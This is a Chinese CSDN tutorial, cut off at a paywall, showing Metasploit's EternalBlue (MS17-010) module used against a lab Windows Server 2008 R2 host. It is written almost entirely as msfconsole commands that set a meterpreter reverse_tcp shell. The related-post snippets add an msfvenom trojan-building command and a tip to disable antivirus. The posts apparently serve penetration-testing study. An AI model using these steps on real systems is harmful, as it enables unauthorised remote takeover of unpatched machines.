[KALI第三章]MSF获取对方system权限

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量1k 收藏 5
点赞数 2
分类专栏: Kali系列 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45919207/article/details/108290920
版权
本文介绍了如何使用Kali Linux中的Metasploit框架(MSF)来获取目标Windows系统的权限。首先,需要初始化并打开MSF,接着利用辅助模块进行配置。然后,通过设置反向TCP连接,等待被攻击机器连接。成功入侵后,输入shell即可控制目标系统。为了防止此类攻击,建议定期更新系统补丁并使用安全软件。
摘要由CSDN通过智能技术生成

[KALI第三章]MSF获取对方system权限

准备

攻击机KALI IP 被攻击机Windows server2008 R2 IP
192.168.85.131 192.168.85.130

初始化并打开MSF

注意:首次使用才需初始化

/etc/init.d/postgresql start
msfdb init
msfconsole

开始

入侵过程

1.我们先使用一个辅助模块

use auxiliary/scanner/smb/smb_ms17_010

2.配置下这个辅助模块

options
set rhosts 192.168.85.130

3然后使用一个攻击模块

use exploit/windows/smb/ms17_010_eternalblue

4.同样配置下这个模块

options
set rhosts 192.168.85.130

5.这时,我们要设置一个反向TCP连接,让被攻击机主动连接我们

set payload windows/x64/meterpreter/reverse_tcp
set lhosts 192.168.85.131

6.开始

run
</
最低0.47元/天 解锁文章
forever无际
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用MSF通过MS17-010获取系统权限
auixc68226的专栏
09-27 724
---恢复内容开始--- Step1:开启postgresql数据库; /etc/init.d/postgresql start Step2:进入MSF,搜索cve17-010相关的exp; search 17-010   其,auxiliary/scanner/smb/smb_ms17_010 是扫描漏洞是否存在的辅助工具      exp...
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 992
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
利用msf生成木马后门获取目标机控制权限
m0_73385645的博客
08-31 286
输入:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本地ip lport=自定义端口 -f exe -o demo9999.exe。将目标程序放入目标机 (注意关闭安全心病毒扫描设置,否则木马程序会被清除)demo9999.exe 木马后门程序的名称。windows 目标机器系统版本。-f 输出木马文件的格式。当目标机打开exe木马后门时会有如下提示。此时已经拿到目标机的操作权限。3.拿到目标机控制权限
Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system权限并读取管理员密码
Mr_Wanderer的博客
08-08 2162
文章目录配置靶机新建低权限用户安装phpstudy为phpstudy相关服务分配权限设置mysql权限设置Apache权限设置apache和MySQLa服务更换phpmyadmin版本漏洞原理使用MSF进行漏洞利用打开msf爆破靶机密码利用phpmyadmin漏洞进行攻击建立稳定连接生成反向连接木马攻击机开启端口监听,等待靶机连接攻击机上传木马并运行提权获取管理员账号和密码加载mimikatz迁移进程写在最后亲测可行。如果本文有帮到您,求点赞留言~如果有任何疑问,请私信我 配置靶机 靶机操作系统选择wind
权限提升-Web权限-MSF自动化
m0_65336233的博客
11-26 1109
简单的提权漏洞讲解
内网渗透-权限提升(使用MSF提权的一些方法)
Ping_Pig的博客
07-03 3291
讲在前面:提权方法有很多种和,这里提供在利用MSF拿到低权限用户后利用MSF提权的办法 直接输入提升权限命令 meterpreter>getsystem 使用MSF内置bypassuac提权 MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。 search bypassuac Matching Modules ================ # Name ...
CISP-PTE维持记录(2022-03-30)
orange777
03-30 6973
0x00前言 初考CIST-PTE是在2019年,今天做了下维持,对其的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其标注的答案部分有极个别可能有误,请慎重! 这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧 0x01选择题 1、()是最常用的公钥密码算法 (2分) A 量子密码B DSAC RSAD 椭圆曲线 2、通过修改HTTP Headers 的哪个键值可以伪造来源网址() (2分) A User-AgentB Accept
【CyberSecurityLearning 附】渗透测试技术选择题 + 法律法规
_Co1a
04-16 1万+
1、RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 2、Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 3、使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 D. -A 4、nmap的-sV是什么操作() A. TCP全连接扫描 B. FIN扫描 C. 版本扫描 D. 全面扫描 5、在HTTP 状态码表示重定向的是() A. 200 B. 302 C. 403 D.
渗透测试知识点--选择题
m0_52996993的博客
01-07 2万+
RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 ...
利用msf入侵电脑
weixin_44761350的博客
05-25 1171
msf
利用msf进行内网的木马渗透详细教程
m0_52332592的博客
11-11 4180
内网渗透木马测试
Kali初次使用如何获得root权限
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
03-30 3024
Kali初次使用如何获得root权限呢,分三步:1、确定用户权限,2找到root账户,更改密码3还使用自定义账户,修改id。下面详细讲解Kali初次使用如何获得root权限。 1、确定用户权限 将下载好的Kali2021镜像文件直接在虚拟机引用,并安装部署,根据提示一步一步安装后,设置了用户名和密码。然后开启虚拟机,输入账户和密码,注意,此时你登录的用户就是你安装Kali时设置的用户,此时该账户没有root权限
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2300
提权是指把普通用户权限进行提升至高权限的过程,也叫特权提升
kali 利用msf通过win7永恒之蓝漏洞获取权限
Snakewood的博客
10-06 7740
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述应该有不少错误,还请各位大佬多包含!好久没有写过博客记录自己的学习了,今天顺手也记录一下。 Eternalblue通过TCP端口445和139来利用SMBv1和NBT的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器植入勒索
msf windows提权方法总结
qq_45951598的博客
06-18 2837
简介 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 1.getsystem 这里使用getsystem命令试一下,运气好的话可能就提到了system 2.bypassuac 内置多个pypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要
msf内网提权
dreamthe的博客
11-22 2341
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
windows 反弹shell_kali的payload的使用攻击之反弹型payload的使用
weixin_39804603的博客
12-03 1070
转自本人博客:https://blog.csdn.net/qq_44276741/article/details/105531525一、msfvenom 命令简介msfvenom是payload产生器,也是shellcode代码生成器Payload,文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode,简单翻译“shell代码”,是Payload的一种,由...
kali生产木马病毒msf
09-08
Kali,可以使用Msfvenom工具生成木马病毒文件。首先,在Kali运行Msfvenom命令,生成木马文件。然后,在同一局域网内的Windows 10主机上,使用浏览器访问生成的木马文件进行下载。然而,根据引用的描述,Windows 10主机上的火绒安全软件会自动识别该木马并将其移除至病毒隔离区。你可以手动将木马文件从病毒隔离区移出,并上传至腾讯哈勃分析系统进行在线病毒识别分析。根据引用的描述,腾讯哈勃分析系统将该木马识别为"轻度风险"。另外,你还可以使用火绒安全软件对木马文件进行杀毒扫描,以获取更多的扫描分析结果。然而,单纯依靠单一的病毒引擎进行识别可能不太可靠,因此可以使用VirusTotal这个在线的多引擎病毒识别工具。引用提到,VirusTotal通过多种反病毒引擎对上传的文件进行检测,以判断文件是否被病毒、蠕虫、木马以及各类恶意软件感染。这样可以大大减少杀毒软件误杀或未检出病毒的几率,并且其检测率优于使用单一产品。所以,在Kali生成的木马病毒文件可以通过VirusTotal进行检测,以获取更准确的检测结果。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值